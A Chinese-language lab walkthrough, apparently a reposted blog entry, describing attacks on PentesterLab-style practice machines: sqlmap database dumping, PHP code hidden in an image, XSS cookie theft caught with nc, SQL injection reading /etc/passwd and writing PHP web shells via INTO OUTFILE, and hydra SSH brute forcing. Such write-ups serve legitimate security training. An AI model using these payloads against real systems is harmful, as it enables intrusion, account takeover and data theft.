xsslabs靶机解题_web 攻击靶机解题过程
sql注入靶機(jī)攻擊過程請參考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶機(jī)的攻擊過程請參考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
nikto –h 192.168.1.129
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" -D photoblog --dump-all --batch
登陸
鍵入以下命令,使用exiftool將PHP惡意代碼隱藏到png圖片中:
Cd Desktop
Exiftool “-comment<=raj.php” 1.png
Exiftool 1.png
打開圖片那個(gè)網(wǎng)址id=4 并查看原圖 再寫入/cmd.php?cmd=ls/etc
稍微修改一下
在192.168.1.127機(jī)器上打開網(wǎng)頁:
是個(gè)博客系統(tǒng)。
每個(gè)博客標(biāo)題下面可以評價(jià):
測試下是否存在xss漏洞。
發(fā)現(xiàn)提交后有彈出框:
進(jìn)一步構(gòu)造內(nèi)容
同時(shí)在192.168.179.142機(jī)器上用nc打開80端口。
在原來機(jī)器上登陸admin賬戶,密碼是p4ssw0rd
登陸進(jìn)去后查看剛才發(fā)布的評論話題。
接著在142這臺機(jī)器查看nc的返回內(nèi)容。
獲取到cookie信息。
復(fù)制下cookie,在142機(jī)器上打開評論所在的網(wǎng)頁。并修改cookie的值為剛才復(fù)制的值。
刷新下頁面,發(fā)現(xiàn)已經(jīng)已a(bǔ)dmin的身份登錄進(jìn)頁面中。
進(jìn)入管理界面后,發(fā)現(xiàn)博客編輯界面存在sql注入漏洞。
http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4
發(fā)現(xiàn)2和3可以顯示出來。
http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4
可以讀取passwd文件,但是不能讀取shadow文件。
在編輯頁面發(fā)現(xiàn)錯(cuò)誤提示中有/var/www/classes 目錄,
在查看源碼時(shí)發(fā)現(xiàn)有css目錄
嘗試后發(fā)現(xiàn)/var/www/css 目錄可寫。
于是構(gòu)造語句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開
http://192.168.179.130/css/s.php
顯示:
說明s.php文件成功寫入到/var/www/css 目錄,下面將
寫入z.php中,構(gòu)造url為:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問z.php,并使用uname -a獲取系統(tǒng)信息。可以遠(yuǎn)程執(zhí)行命令。
下面寫入一句話木馬,構(gòu)造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀鏈接:
之前發(fā)現(xiàn)機(jī)器開了ssh,因此用hydra爆破下:
ssh登陸
總結(jié)
以上是生活随笔為你收集整理的xsslabs靶机解题_web 攻击靶机解题过程的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: seata执行闪退_Seata 1.2.
- 下一篇: cairosvg在linux中的安装_直